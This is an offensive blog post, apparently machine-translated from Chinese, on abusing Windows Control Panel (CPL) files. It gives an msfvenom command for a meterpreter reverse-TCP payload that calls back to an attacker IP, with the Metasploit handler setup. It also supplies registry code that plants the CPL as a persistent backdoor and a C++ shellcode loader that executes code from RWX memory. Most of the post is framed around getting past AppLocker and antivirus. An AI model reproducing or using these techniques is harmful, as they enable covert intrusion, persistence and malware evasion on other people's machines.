Skillfully use CPL files to protect rights and avoid killing

preface

Recently, I came across CPL files by accident. Before, I knew almost nothing about this type of files. As IT touched my knowledge blind spot, I decided to explore it.

CPL file

CPL file, is a Windows control panel extension, CPL full spell forControl Panel Item

There are a series of CPL files in the system32 directory that correspond to the various control panel suboptions

On ourwin+RThe inputmain.cpl

The mouse properties in the control panel will open

CPL files are PE files in nature

However, CPL is more like a DLL than an EXE, which cannot be opened directly and can only be run as a load.

And there’s a derived functionCPlApplet

This function is the entry point to the control panel application, is automatically called by the control panel manager, and is a callback function.

How do I open CPL

2. Control < file name > 3. Rundll32 shell32.dll,Control_RunDLL < file name > All rundll32 shell32.dll,Control_RunDLL commands can be replaced by control, control.exe calls rundll32.exe. The Control.exe process cannot be found when opened, only rundll32.exe can be found.

4. VBS script

Dim objSet obj = CreateObject("Shell.Application")obj.ControlPanelItem("C:\\Users\\11793\\Desktop\\cpl.cpl")
Copy the code

5. Js script

var a = new ActiveXObject("Shell.Application"); a.ControlPanelItem("C:\\\Users\\\11793\\\Desktop\\\cpl.cpl");Copy the code

How do I make a CPL file myself

The simplest way is to create a DLL without exporting the function and change the suffix

BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul\_reason\_for\_call, LPVOID lpReserved ){ switch (ul\_reason\_for\_call) { case DLL\_PROCESS\_ATTACH: WinExec("Calc.exe", SW\_SHOW); case DLL\_THREAD\_ATTACH: case DLL\_THREAD\_DETACH: case DLL\_PROCESS_DETACH: break; } return TRUE; }Copy the code

Do it either way

So, if you can pop calc.exe, can you execute your own payload?

CPL file application

bypass Windows AppLocker

What is Windows AppLocker? AppLocker is a new security function added in Windows 7. This function is integrated by default in Windows 7 and above.

The default Applocker rule set, you can see that CPL is not in the default rule:

Enable Applocker rule:

Open computer Management, select Services, and setApplication IdentityService is open

Then add an Applocker rule to the security policy and ask whether to add a default rule

The default rule is:

If a path cannot be set to execute an executable, the next run will prompt the group policy to be safe and not allowed to run

There are many ways to get around this, but I’ll just focus on CPL files

You can write the code to a CPL file for execution purposes, so here is a CMD

MSF generates CPL files directly

Generate the CPL file

Msfvenom -p Windows/meterpreter/reverse_tcp - b '\ x00 \ XFF lhost = 192.168.111.128 lport = 8877 - f DLL - o CPL. CPL

Drag the file to local and run it, MSF listening

• use exploit/multi/handler

• set payload windows/meterpreter/reverse_tcp

• The set lhost 192.168.111.128

• set lport 8877

• exploit

This is certainly not enough, but the CPL file can be used as a backdoor to achieve a privilege maintenance effect, and relatively hidden.

Change the CPL file name totest.cpl

Create a project to modify the registry:

HKEY hKey; DWORD dwDisposition; char path\[\] = "C:\\\test.cpl"; RegCreateKeyExA(HKEY\_CURRENT\_USER,"Software\\\Microsoft\\\Windows\\\CurrentVersion\\\Control Panel\\\Cpls", 0, NULL, 0, KEY\_WRITE, NULL, & hKey, & dwDisposition); RegSetValueExA(hKey, "test.cpl", 0, REG\_SZ, (BYTE*)path, (1 + ::lstrlenA(path)));Copy the code

You do not need to save the CPL file to drive C. You can customize the path

After performing



Then when control.exe is opened, the test. CPL file will also be opened.

If the target host has kill soft, you can use this method to bypass white and black, but MSF CPL file characteristics are very obvious, static too likely to be killed.



In addition to shell, hope to own implementation load shellcode, easy to do confusion.

Make your own CPL file using ShellCode

Go straight to code

#include "pch.h"#include "windows.h"extern "C" \_\_declspec(dllexport) VOID CPlApplet(HWND hwndCPl, UINT msg, LPARAM lParam1, LPARAM lParam2){ MessageBoxA(0, NULL, "test", MB\_OK); /* length: 835 bytes */ unsigned char buf\[\] = "shellcode"; LPVOID Memory = VirtualAlloc(NULL, sizeof(buf), MEM\_COMMIT | MEM\_RESERVE, PAGE\_EXECUTE\_READWRITE); memcpy(Memory, buf, sizeof(buf)); ((void(*)())Memory)(); }BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul\_reason\_for\_call, LPVOID lpReserved ){ switch (ul\_reason\_for\_call) { case DLL\_PROCESS\_ATTACH: case DLL\_THREAD\_ATTACH: case DLL\_THREAD\_DETACH: case DLL\_PROCESS\_DETACH: break; } return TRUE; }Copy the code

This is the very, very basic loader

To open the firstcontrol.exeSee the effect

Look at the kill rate

Shellcode does not do any processing on the uploaded text here, and the kill rate is relatively low. If it is confused, it is easy to static kill soft, and then add white and black, isn’t it easy to think about it?

After a series of processing, look for the 360 that kill poison ability still is stronger try